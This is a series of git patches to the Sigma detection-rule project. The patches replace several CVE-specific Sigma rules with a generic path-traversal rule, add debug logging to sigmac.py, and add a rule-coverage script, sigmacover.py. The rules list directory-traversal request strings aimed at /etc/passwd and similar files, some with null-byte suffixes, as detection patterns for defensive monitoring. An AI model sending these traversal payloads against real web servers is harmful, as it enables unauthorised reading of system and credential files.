+++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-3426 Exploitation Attempt -id: 4387e23a-0022-454e-8f9a-e2f19b97fbce -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion:Directory - traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha - 3 for Joomla! allows remote attackers to include and execute arbitrary local files - via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_4231_exploitation_attempt.yml b/rules/web/web_cve_2010_4231_exploitation_attempt.yml deleted file mode 100644 index a04663df..00000000 --- a/rules/web/web_cve_2010_4231_exploitation_attempt.yml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-4231 Exploitation Attempt -id: 7f38b244-d9e1-4ad4-a4c2-326accaefbfd -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Camtron CMNC-200 IP Camera - Directory Traversal:The CMNC-200 IP Camera - has a built-in web server that is enabled by default. The server is vulnerable to - directory transversal attacks, allowing access to any file on the camera file system. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /../../../../../../../../../../../../../etc/passwd - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_4617_exploitation_attempt.yml b/rules/web/web_cve_2010_4617_exploitation_attempt.yml deleted file mode 100644 index 9cb15eca..00000000 --- a/rules/web/web_cve_2010_4617_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-4617 Exploitation Attempt -id: 62a7a20d-34f2-4b54-962b-539f17723730 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component JotLoader 2.2.1 - Local File Inclusion:Directory traversal - vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows - remote attackers to read arbitrary files via directory traversal sequences in the - section parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_path_traversal_exploitation_attempt.yml b/rules/web/web_path_traversal_exploitation_attempt.yml new file mode 100644 index 00000000..e0d8c12f --- /dev/null +++ b/rules/web/web_path_traversal_exploitation_attempt.yml @@ -0,0 +1,26 @@ +title: Path Traversal Exploitation Attempts +id: f28d6faa-4163-4967-b397-414aab6cbe41 +author: Subhash Popuri (@pbssubhash), Florian Roth (generalisation) +date: 2021/08/25 +modified: 2021/09/25 +status: experimental +description: Detects path traversal exploitation attempts +references: + - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver +detection: + selection: + c-uri|contains: + - '../../../../../etc/passwd' + - '../../../../windows/' + - '../../../../../lib/password' + condition: selection +false_positives: + - Happens all the time on systems exposed to the Internet + - Penetration testing activity on internal systems + - Internal vulnerability scanners +tags: + - attack.initial_access + - attack.t1190 +level: medium From 93bff7f49d6397d2cb2466945122d1790e31fdef Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 25 Sep 2021 11:37:39 +0200 Subject: [PATCH 1110/1367] docs: new ID --- rules/web/web_path_traversal_exploitation_attempt.yml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/rules/web/web_path_traversal_exploitation_attempt.yml b/rules/web/web_path_traversal_exploitation_attempt.yml index e0d8c12f..4a2591c9 100644 --- a/rules/web/web_path_traversal_exploitation_attempt.yml +++ b/rules/web/web_path_traversal_exploitation_attempt.yml @@ -1,8 +1,7 @@ title: Path Traversal Exploitation Attempts -id: f28d6faa-4163-4967-b397-414aab6cbe41 +id: 7745c2ea-24a5-4290-b680-04359cb84b35 author: Subhash Popuri (@pbssubhash), Florian Roth (generalisation) -date: 2021/08/25 -modified: 2021/09/25 +date: 2021/09/25 status: experimental description: Detects path traversal exploitation attempts references: From d08d3712bef9aeea86cc8dc4b4be3c91926a0cee Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 25 Sep 2021 19:33:30 +0200 Subject: [PATCH 1111/1367] Add more debug info --- tools/sigma/sigmac.py | 27 +++++++++++++++++++++++++-- 1 file changed, 25 insertions(+), 2 deletions(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 350ffb86..52b04a24 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -151,6 +151,7 @@ def main(): logger = logging.getLogger(__name__) if cmdargs.debug: # pragma: no cover + logging.basicConfig(filename='sigmac.log', filemode='w', level=logging.DEBUG) logger.setLevel(logging.DEBUG) if cmdargs.lists: @@ -175,6 +176,8 @@ def main(): argparser.print_usage() sys.exit(ERR_NO_TARGET) + logger.debug("* Target selected %s" % (cmdargs.target)) + rulefilter = None if cmdargs.filter: try: @@ -265,6 +268,7 @@ def main(): output_array = [] for sigmafile in get_inputs(cmdargs.inputs, cmdargs.recurse): logger.debug("* Processing Sigma input %s" % (sigmafile)) + success = True try: if cmdargs.inputs == ['-']: f = sigmafile @@ -325,43 +329,59 @@ def main(): except OSError as e: print("Failed to open Sigma file %s: %s" % (sigmafile, str(e)), file=sys.stderr) + logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) + success = False error = ERR_OPEN_SIGMA_RULE except (yaml.parser.ParserError, yaml.scanner.ScannerError) as e: print("Error: Sigma file %s is no valid YAML: %s" % (sigmafile, str(e)), file=sys.stderr) + logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) + success = False error = ERR_INVALID_YAML if not cmdargs.defer_abort: sys.exit(error) except (SigmaParseError, SigmaCollectionParseError) as e: print("Error: Sigma parse error in %s: %s" % (sigmafile, str(e)), file=sys.stderr) + logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) + success = False error = ERR_SIGMA_PARSING if not cmdargs.defer_abort: sys.exit(error) except NotSupportedError as e: print("Error: The Sigma rule requires a feature that is not supported by the target system: " + str(e), file=sys.stderr) + logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) + success = False if not cmdargs.ignore_backend_errors: error = ERR_NOT_SUPPORTED if not cmdargs.defer_abort: sys.exit(error) except BackendError as e: print("Error: Backend error in %s: %s" % (sigmafile, str(e)), file=sys.stderr) + logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) + success = False if not cmdargs.ignore_backend_errors: error = ERR_BACKEND if not cmdargs.defer_abort: sys.exit(error) except (NotImplementedError, TypeError) as e: print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) + logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) + success = False if not cmdargs.ignore_backend_errors: error = ERR_NOT_IMPLEMENTED if not cmdargs.defer_abort: sys.exit(error) except PartialMatchError as e: print("Error: Partial field match error: %s" % str(e), file=sys.stderr) + logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) + success = False if not cmdargs.ignore_backend_errors: error = ERR_PARTIAL_FIELD_MATCH if not cmdargs.defer_abort: sys.exit(error) except FullMatchError as e: print("Error: Full field match error", file=sys.stderr) + logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) + success = False if not cmdargs.ignore_backend_errors: error = ERR_FULL_FIELD_MATCH if not cmdargs.defer_abort: @@ -371,11 +391,14 @@ def main(): f.close() except: pass - + + if success : + logger.debug("* Convertion Sigma input %s SUCCESS" % (sigmafile)) + result = backend.finalize() if result: print(result, file=out) - + if cmdargs.output_fields: if cmdargs.output_format == 'json': print(json.dumps(output_array, indent=4, ensure_ascii=False), file=out) From d888ce67bc179a86bedd3501cb28b80af3c8eb9d Mon Sep 17 00:00:00 2001 From: MetallicHack <35694352+MetallicHack@users.noreply.github.com> Date: Sat, 25 Sep 2021 21:57:10 +0200 Subject: [PATCH 1112/1367] Create azure_ad_user_added_to_sensitive_role.yml --- rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml diff --git a/rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml b/rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml new file mode 100644 index 00000000..9daeafb9 --- /dev/null +++ b/rules/cloud/azure/azure_ad_user_added_to_sensitive_role.yml @@ -0,0 +1 @@ +test From f196e3174d6edc30f78d0fa53e2d05dd01ff53fc Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 26 Sep 2021 10:54:11 +0200 Subject: [PATCH 1113/1367] refactor: moved last global rule to unsupported --- .../windows/builtin => rules-unsupported}/win_apt_apt29_tor.yml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {rules/windows/builtin => rules-unsupported}/win_apt_apt29_tor.yml (100%) mode change 100755 => 100644 diff --git a/rules/windows/builtin/win_apt_apt29_tor.yml b/rules-unsupported/win_apt_apt29_tor.yml old mode 100755 new mode 100644 similarity index 100% rename from rules/windows/builtin/win_apt_apt29_tor.yml rename to rules-unsupported/win_apt_apt29_tor.yml From 5e5af2918bb0e1d4ef4ee7bf9929e8b221cf5133 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 26 Sep 2021 11:24:25 +0200 Subject: [PATCH 1114/1367] Add sigmacover.py --- contrib/sigmacover.py | 123 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 123 insertions(+) create mode 100644 contrib/sigmacover.py diff --git a/contrib/sigmacover.py b/contrib/sigmacover.py new file mode 100644 index 00000000..0976b809 --- /dev/null +++ b/contrib/sigmacover.py @@ -0,0 +1,123 @@ +# GNU Lesser General Public License for more details. +# +# You should have received a copy of the GNU Lesser General Public License +# along with this program. If not, see . +""" +Project: sigmacover.py +Date: 26/09/2021 +Author: frack113 +Version: 1.0 +Description: + get cover of the rules vs backend + It is more a POC than a script for the moment +Requirements: + $ pip install ruyaml +Todo: + - add output options + - clean code and bug + - better use of subprocess.run + - have idea +""" + + +import re +import subprocess +import pathlib +import ruyaml + + +def get_sigmac(options): + infos = [] + ret = subprocess.run(options,) + log = pathlib.Path("sigmac.log") + with log.open() as f: + lines = f.readlines() + for line in lines: + if "Convertion Sigma input" in line: + info = re.findall("Convertion Sigma input \S+\\\\(\w+\.yml) (\w+)",line)[0] + infos.append(info) + log.unlink() + return infos + +def update_dict(my_dict,my_data,backend): + for file,state in my_data: + my_dict[file][backend] = state + +#the backend dict command line options +backend_dict = { + "ala" : ["python","../tools/sigmac","-t","ala","--debug","-rI","../rules"], + "ala-rule" : ["python","../tools/sigmac","-t","ala-rule","--debug","-rI","../rules"], + "arcsight": ["python","../tools/sigmac","-t","arcsight","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "arcsight-esm": ["python","../tools/sigmac","-t","arcsight-esm","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "carbonblack": ["python","../tools/sigmac","-t","carbonblack","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "chronicle": ["python","../tools/sigmac","-t","chronicle","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "crowdstrike": ["python","../tools/sigmac","-t","crowdstrike","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "csharp" : ["python","../tools/sigmac","-t","csharp","--debug","-rI","../rules"], + "devo": ["python","../tools/sigmac","-t","devo","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "ee-outliers": ["python","../tools/sigmac","-t","ee-outliers","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "elastalert": ["python","../tools/sigmac","-t","elastalert","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "elastalert-dsl": ["python","../tools/sigmac","-t","elastalert-dsl","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "es-dsl": ["python","../tools/sigmac","-t","es-dsl","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "es-eql": ["python","../tools/sigmac","-t","es-eql","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "es-qs": ["python","../tools/sigmac","-t","es-qs","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "es-qs-lr": ["python","../tools/sigmac","-t","es-qs-lr","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "es-rule": ["python","../tools/sigmac","-t","es-rule","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "es-rule-eql": ["python","../tools/sigmac","-t","es-rule-eql","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "fireeye-helix": ["python","../tools/sigmac","-t","fireeye-helix","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "graylog" : ["python","../tools/sigmac","-t","graylog","--debug","-rI","../rules"], + "grep" : ["python","../tools/sigmac","-t","grep","--debug","-rI","../rules"], + "humio": ["python","../tools/sigmac","-t","humio","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "kibana": ["python","../tools/sigmac","-t","kibana","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "kibana-ndjson": ["python","../tools/sigmac","-t","kibana-ndjson","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "lacework" : ["python","../tools/sigmac","-t","lacework","--debug","-rI","../rules"], + "limacharlie" : ["python","../tools/sigmac","-t","limacharlie","--debug","-rI","../rules"], + "logiq" : ["python","../tools/sigmac","-t","logiq","--debug","-rI","../rules"], + "logpoint" : ["python","../tools/sigmac","-t","logpoint","--debug","-rI","../rules"], + "mdatp" : ["python","../tools/sigmac","-t","mdatp","--debug","-rI","../rules"], + "netwitness" : ["python","../tools/sigmac","-t","netwitness","--debug","-rI","../rules"], + "netwitness-epl" : ["python","../tools/sigmac","-t","netwitness-epl","--debug","-rI","../rules"], + "opensearch-monitor": ["python","../tools/sigmac","-t","opensearch-monitor","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "powershell" : ["python","../tools/sigmac","-t","powershell","--debug","-rI","../rules"], + "qradar" : ["python","../tools/sigmac","-t","qradar","--debug","-rI","../rules"], + "qualys" : ["python","../tools/sigmac","-t","qualys","--debug","-rI","../rules"], + "sentinel-rule" : ["python","../tools/sigmac","-t","sentinel-rule","--debug","-rI","../rules"], + "splunk": ["python","../tools/sigmac","-t","splunk","-c","../tools/config/splunk-windows.yml","--debug","-rI","../rules"], + "splunkdm": ["python","../tools/sigmac","-t","splunkdm","-c","../tools/config/splunk-windows.yml","--debug","-rI","../rules"], + "splunkxml": ["python","../tools/sigmac","-t","splunkxml","-c","../tools/config/splunk-windows.yml","--debug","-rI","../rules"], + "sql": ["python","../tools/sigmac","-t","sql","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "sqlite": ["python","../tools/sigmac","-t","sqlite","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], + "stix": ["python","../tools/sigmac","-t","stix","-c","../tools/config/stix2.0.yml","--debug","-rI","../rules"], + "sumologic" : ["python","../tools/sigmac","-t","sumologic","--debug","-rI","../rules"], + "sumologic-cse" : ["python","../tools/sigmac","-t","sumologic-cse","--debug","-rI","../rules"], + "sumologic-cse-rule" : ["python","../tools/sigmac","-t","sumologic-cse-rule","--debug","-rI","../rules"], + "sysmon": ["python","../tools/sigmac","-t","stix","-c","../tools/config/sysmon.yml","--debug","-rI","../rules"], + "uberagent" : ["python","../tools/sigmac","-t","uberagent","--debug","-rI","../rules"], + "xpack-watcher": ["python","../tools/sigmac","-t","xpack-watcher","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + } + +print(""" +███ ███ ████ █▄┼▄█ ███ ┼┼ ███ ███ █▄█ ███ ███ +█▄▄ ┼█┼ █┼▄▄ █┼█┼█ █▄█ ┼┼ █┼┼ █┼█ ███ █▄┼ █▄┼ +▄▄█ ▄█▄ █▄▄█ █┼┼┼█ █┼█ ┼┼ ███ █▄█ ┼█┼ █▄▄ █┼█ + v1.0 +please wait during the tests +""") + +#init dict of all rules +default_key_test = {key : "NO TEST" for key in backend_dict.keys()} +the_dico ={} +rules = pathlib.Path("../rules").glob("**/*.yml") +for rule in rules: + the_dico[rule.name] = default_key_test + +#Check all the backend +for name,opt in backend_dict.items(): + print (f"check backend : {name}") + result = get_sigmac(opt) + update_dict(the_dico,result,name) + +#Save +cover = pathlib.Path("sigmacover.yml") +with cover.open("w") as f: + ruyaml.dump(the_dico, f, Dumper=ruyaml.RoundTripDumper) + From 776cccce30475122431250b141ee917555c44e92 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 26 Sep 2021 17:07:58 +0200 Subject: [PATCH 1115/1367] Fix windows10 --- contrib/sigmacover.py | 124 ++++++++++++++++++++++++------------------ 1 file changed, 70 insertions(+), 54 deletions(-) diff --git a/contrib/sigmacover.py b/contrib/sigmacover.py index 0976b809..d498cae2 100644 --- a/contrib/sigmacover.py +++ b/contrib/sigmacover.py @@ -6,11 +6,12 @@ Project: sigmacover.py Date: 26/09/2021 Author: frack113 -Version: 1.0 +Version: 1.1 Description: get cover of the rules vs backend It is more a POC than a script for the moment Requirements: + python 3.7 min $ pip install ruyaml Todo: - add output options @@ -24,11 +25,23 @@ import re import subprocess import pathlib import ruyaml +import copy - -def get_sigmac(options): +def get_sigmac(name,conf): infos = [] - ret = subprocess.run(options,) + if conf == None: + options = ["python","../tools/sigmac","-t",name,"--debug","-rI","-o","dump.txt","../rules"] + else: + options = ["python","../tools/sigmac","-t",name,"-c",conf,"--debug","-rI","-o","dump.txt","../rules"] + si = subprocess.STARTUPINFO() + si.dwFlags |= subprocess.STARTF_USESHOWWINDOW + ret = subprocess.run(options, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + startupinfo=si + ) + if not ret.returncode == 0: + print (f"error {ret.returncode} in sigmac") log = pathlib.Path("sigmac.log") with log.open() as f: lines = f.readlines() @@ -37,6 +50,9 @@ def get_sigmac(options): info = re.findall("Convertion Sigma input \S+\\\\(\w+\.yml) (\w+)",line)[0] infos.append(info) log.unlink() + dump = pathlib.Path("dump.txt") + if dump.exists(): + dump.unlink() return infos def update_dict(my_dict,my_data,backend): @@ -45,54 +61,54 @@ def update_dict(my_dict,my_data,backend): #the backend dict command line options backend_dict = { - "ala" : ["python","../tools/sigmac","-t","ala","--debug","-rI","../rules"], - "ala-rule" : ["python","../tools/sigmac","-t","ala-rule","--debug","-rI","../rules"], - "arcsight": ["python","../tools/sigmac","-t","arcsight","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "arcsight-esm": ["python","../tools/sigmac","-t","arcsight-esm","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "carbonblack": ["python","../tools/sigmac","-t","carbonblack","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "chronicle": ["python","../tools/sigmac","-t","chronicle","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "crowdstrike": ["python","../tools/sigmac","-t","crowdstrike","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "csharp" : ["python","../tools/sigmac","-t","csharp","--debug","-rI","../rules"], - "devo": ["python","../tools/sigmac","-t","devo","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "ee-outliers": ["python","../tools/sigmac","-t","ee-outliers","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "elastalert": ["python","../tools/sigmac","-t","elastalert","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "elastalert-dsl": ["python","../tools/sigmac","-t","elastalert-dsl","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "es-dsl": ["python","../tools/sigmac","-t","es-dsl","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "es-eql": ["python","../tools/sigmac","-t","es-eql","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "es-qs": ["python","../tools/sigmac","-t","es-qs","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "es-qs-lr": ["python","../tools/sigmac","-t","es-qs-lr","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "es-rule": ["python","../tools/sigmac","-t","es-rule","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "es-rule-eql": ["python","../tools/sigmac","-t","es-rule-eql","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "fireeye-helix": ["python","../tools/sigmac","-t","fireeye-helix","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "graylog" : ["python","../tools/sigmac","-t","graylog","--debug","-rI","../rules"], - "grep" : ["python","../tools/sigmac","-t","grep","--debug","-rI","../rules"], - "humio": ["python","../tools/sigmac","-t","humio","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "kibana": ["python","../tools/sigmac","-t","kibana","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "kibana-ndjson": ["python","../tools/sigmac","-t","kibana-ndjson","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "lacework" : ["python","../tools/sigmac","-t","lacework","--debug","-rI","../rules"], - "limacharlie" : ["python","../tools/sigmac","-t","limacharlie","--debug","-rI","../rules"], - "logiq" : ["python","../tools/sigmac","-t","logiq","--debug","-rI","../rules"], - "logpoint" : ["python","../tools/sigmac","-t","logpoint","--debug","-rI","../rules"], - "mdatp" : ["python","../tools/sigmac","-t","mdatp","--debug","-rI","../rules"], - "netwitness" : ["python","../tools/sigmac","-t","netwitness","--debug","-rI","../rules"], - "netwitness-epl" : ["python","../tools/sigmac","-t","netwitness-epl","--debug","-rI","../rules"], - "opensearch-monitor": ["python","../tools/sigmac","-t","opensearch-monitor","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], - "powershell" : ["python","../tools/sigmac","-t","powershell","--debug","-rI","../rules"], - "qradar" : ["python","../tools/sigmac","-t","qradar","--debug","-rI","../rules"], - "qualys" : ["python","../tools/sigmac","-t","qualys","--debug","-rI","../rules"], - "sentinel-rule" : ["python","../tools/sigmac","-t","sentinel-rule","--debug","-rI","../rules"], - "splunk": ["python","../tools/sigmac","-t","splunk","-c","../tools/config/splunk-windows.yml","--debug","-rI","../rules"], - "splunkdm": ["python","../tools/sigmac","-t","splunkdm","-c","../tools/config/splunk-windows.yml","--debug","-rI","../rules"], - "splunkxml": ["python","../tools/sigmac","-t","splunkxml","-c","../tools/config/splunk-windows.yml","--debug","-rI","../rules"], - "sql": ["python","../tools/sigmac","-t","sql","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "sqlite": ["python","../tools/sigmac","-t","sqlite","-c","../tools/config/elk-winlogbeat.yml","--debug","-rI","../rules"], - "stix": ["python","../tools/sigmac","-t","stix","-c","../tools/config/stix2.0.yml","--debug","-rI","../rules"], - "sumologic" : ["python","../tools/sigmac","-t","sumologic","--debug","-rI","../rules"], - "sumologic-cse" : ["python","../tools/sigmac","-t","sumologic-cse","--debug","-rI","../rules"], - "sumologic-cse-rule" : ["python","../tools/sigmac","-t","sumologic-cse-rule","--debug","-rI","../rules"], - "sysmon": ["python","../tools/sigmac","-t","stix","-c","../tools/config/sysmon.yml","--debug","-rI","../rules"], - "uberagent" : ["python","../tools/sigmac","-t","uberagent","--debug","-rI","../rules"], - "xpack-watcher": ["python","../tools/sigmac","-t","xpack-watcher","-c","../tools/config/winlogbeat.yml","--debug","-rI","../rules"], + "ala": None, + "ala-rule": None, + "arcsight": "../tools/config/elk-winlogbeat.yml", + "arcsight-esm": "../tools/config/elk-winlogbeat.yml", + "carbonblack": "../tools/config/elk-winlogbeat.yml", + "chronicle": "../tools/config/elk-winlogbeat.yml", + "crowdstrike": "../tools/config/elk-winlogbeat.yml", + "csharp" : None, + "devo": "../tools/config/elk-winlogbeat.yml", + "ee-outliers": "../tools/config/winlogbeat-modules-enabled.yml", + "elastalert": "../tools/config/winlogbeat-modules-enabled.yml", + "elastalert-dsl": "../tools/config/winlogbeat-modules-enabled.yml", + "es-dsl": "../tools/config/winlogbeat-modules-enabled.yml", + "es-eql": "../tools/config/winlogbeat-modules-enabled.yml", + "es-qs": "../tools/config/winlogbeat-modules-enabled.yml", + "es-qs-lr": "../tools/config/logrhythm_winevent.yml", + "es-rule": "../tools/config/winlogbeat-modules-enabled.yml", + "es-rule-eql": "../tools/config/winlogbeat-modules-enabled.yml", + "fireeye-helix": "../tools/config/elk-winlogbeat.yml", + "graylog" : None, + "grep" : None, + "humio": "../tools/config/elk-winlogbeat.yml", + "kibana": "../tools/config/winlogbeat-modules-enabled.yml", + "kibana-ndjson": "../tools/config/winlogbeat-modules-enabled.yml", + "lacework" : None, + "limacharlie" : None, + "logiq" : None, + "logpoint" : None, + "mdatp" : None, + "netwitness" : None, + "netwitness-epl" : None, + "opensearch-monitor": "../tools/config/winlogbeat.yml", + "powershell" : None, + "qradar" : None, + "qualys" : None, + "sentinel-rule" : None, + "splunk": "../tools/config/splunk-windows.yml", + "splunkdm": "../tools/config/splunk-windows.yml", + "splunkxml": "../tools/config/splunk-windows.yml", + "sql": "../tools/config/elk-winlogbeat.yml", + "sqlite": "../tools/config/elk-winlogbeat.yml", + "stix": "../tools/config/stix2.0.yml", + "sumologic" : None, + "sumologic-cse" : None, + "sumologic-cse-rule" : None, + "sysmon": "../tools/config/sysmon.yml", + "uberagent" : None, + "xpack-watcher": "../tools/config/winlogbeat-modules-enabled.yml", } print(""" @@ -108,12 +124,12 @@ default_key_test = {key : "NO TEST" for key in backend_dict.keys()} the_dico ={} rules = pathlib.Path("../rules").glob("**/*.yml") for rule in rules: - the_dico[rule.name] = default_key_test + the_dico[rule.name] = copy.deepcopy(default_key_test) #Check all the backend for name,opt in backend_dict.items(): print (f"check backend : {name}") - result = get_sigmac(opt) + result = get_sigmac(name,opt) update_dict(the_dico,result,name) #Save From 8f99625a25b3a1137a47375fcaa4f293dfd3916a Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 26 Sep 2021 18:28:07 +0200 Subject: [PATCH 1116/1367] Fix ubuntu 20 --- contrib/sigmacover.py | 53 ++++++++++++++++++++++++++++++------------- 1 file changed, 37 insertions(+), 16 deletions(-) diff --git a/contrib/sigmacover.py b/contrib/sigmacover.py index d498cae2..3c33e4f2 100644 --- a/contrib/sigmacover.py +++ b/contrib/sigmacover.py @@ -9,12 +9,10 @@ Author: frack113 Version: 1.1 Description: get cover of the rules vs backend - It is more a POC than a script for the moment Requirements: python 3.7 min $ pip install ruyaml Todo: - - add output options - clean code and bug - better use of subprocess.run - have idea @@ -25,7 +23,10 @@ import re import subprocess import pathlib import ruyaml +import json import copy +import platform +import argparse def get_sigmac(name,conf): infos = [] @@ -33,13 +34,21 @@ def get_sigmac(name,conf): options = ["python","../tools/sigmac","-t",name,"--debug","-rI","-o","dump.txt","../rules"] else: options = ["python","../tools/sigmac","-t",name,"-c",conf,"--debug","-rI","-o","dump.txt","../rules"] - si = subprocess.STARTUPINFO() - si.dwFlags |= subprocess.STARTF_USESHOWWINDOW - ret = subprocess.run(options, - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - startupinfo=si - ) + if platform.system() == "Windows": + si = subprocess.STARTUPINFO() + si.dwFlags |= subprocess.STARTF_USESHOWWINDOW + ret = subprocess.run(options, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + startupinfo=si + ) + my_regex = "Convertion Sigma input \S+\\\\(\w+\.yml) (\w+)" + else: + ret = subprocess.run(options, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + ) + my_regex = "Convertion Sigma input \S+/(\w+\.yml) (\w+)" if not ret.returncode == 0: print (f"error {ret.returncode} in sigmac") log = pathlib.Path("sigmac.log") @@ -47,7 +56,7 @@ def get_sigmac(name,conf): lines = f.readlines() for line in lines: if "Convertion Sigma input" in line: - info = re.findall("Convertion Sigma input \S+\\\\(\w+\.yml) (\w+)",line)[0] + info = re.findall(my_regex,line)[0] infos.append(info) log.unlink() dump = pathlib.Path("dump.txt") @@ -106,7 +115,7 @@ backend_dict = { "sumologic" : None, "sumologic-cse" : None, "sumologic-cse-rule" : None, - "sysmon": "../tools/config/sysmon.yml", + "sysmon": "../tools/config/elk-windows.yml", "uberagent" : None, "xpack-watcher": "../tools/config/winlogbeat-modules-enabled.yml", } @@ -115,10 +124,17 @@ print(""" ███ ███ ████ █▄┼▄█ ███ ┼┼ ███ ███ █▄█ ███ ███ █▄▄ ┼█┼ █┼▄▄ █┼█┼█ █▄█ ┼┼ █┼┼ █┼█ ███ █▄┼ █▄┼ ▄▄█ ▄█▄ █▄▄█ █┼┼┼█ █┼█ ┼┼ ███ █▄█ ┼█┼ █▄▄ █┼█ - v1.0 + v1.1 bugfix please wait during the tests """) +argparser = argparse.ArgumentParser(description="Check Sigma rules with all backend.") +argparser.add_argument("--target", "-t", choices=["yaml","json"], help="Output target format") +cmdargs = argparser.parse_args() +if cmdargs.target == None: + print("No outpout use -h to see help") + exit() + #init dict of all rules default_key_test = {key : "NO TEST" for key in backend_dict.keys()} the_dico ={} @@ -133,7 +149,12 @@ for name,opt in 